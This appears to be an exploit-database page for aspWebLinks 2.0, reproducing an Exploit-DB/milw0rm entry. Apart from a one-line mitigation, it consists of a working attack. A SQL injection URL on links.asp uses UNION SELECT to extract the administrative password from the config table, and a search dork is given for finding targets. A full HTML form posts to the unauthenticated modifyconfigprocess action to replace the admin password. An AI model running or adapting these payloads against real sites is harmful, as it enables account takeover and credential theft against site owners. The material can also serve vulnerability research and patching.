header-logo
Suggest Exploit
vendor:
aspWebLinks
by:
ajann
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: aspWebLinks
Affected Version From: aspWebLinks 2.0
Affected Version To: aspWebLinks 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection

This exploit allows an attacker to change the administrative password remotely in aspWebLinks 2.0 by exploiting a SQL injection vulnerability in the links.asp page.

Mitigation:

Apply proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

<!--
# Title  :   aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author :   ajann
# Dork   :   aspWebLinks 2.0

SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->


<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input 
type='hidden' name='txtConfigID' value='1'><input type='hidden' 
name='txtSkinName' value='default'><table border='0' width='100%' 
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative 
Password:</b></font></td><td width='70%'><input type='text' 
name='txtAdministrativePassword' size='43' 
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days 
New:</b></font></td><td width='70%'><input type='text' 
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input 
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input 
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Category Header:</b></font></td><td width='70%'><input 
type='text' name='txtCategoryHeader' size='43' value='<b>Select A 
Category:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Category 
Columns:</b></font></td><td width='70%'><input type='text' 
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub 
Category Header:</b></font></td><td width='70%'><input type='text' 
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick 
or ADD your link:'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category 
Description:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowCatDescription' checked >YES<input type='radio' value='NO' 
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on 
home page:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' 
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Show Whats Hot on home page:</b></font></td><td 
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked 
 >YES<input type='radio' value='NO' name='txtShowWhatsHot' 
 >NO</td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Require approval for link and review 
additions:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtNeedApproval' checked >YES<input type='radio' value='NO' 
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input 
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats 
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td 
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' 
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links 
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option 
selected value='ALPHA'>Alphabetically</option><option  value='DATE'>Date 
Added</option><option  value='HITS'>Number of 
Visits</option></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" 
color="black"><b></b></font></td><td width='70%'><input type='submit' 
value='Update Configuration' name='B1'></td></tr></table></form>

# milw0rm.com [2006-06-01]

Navigation

Suggest Exploit

Services By CQR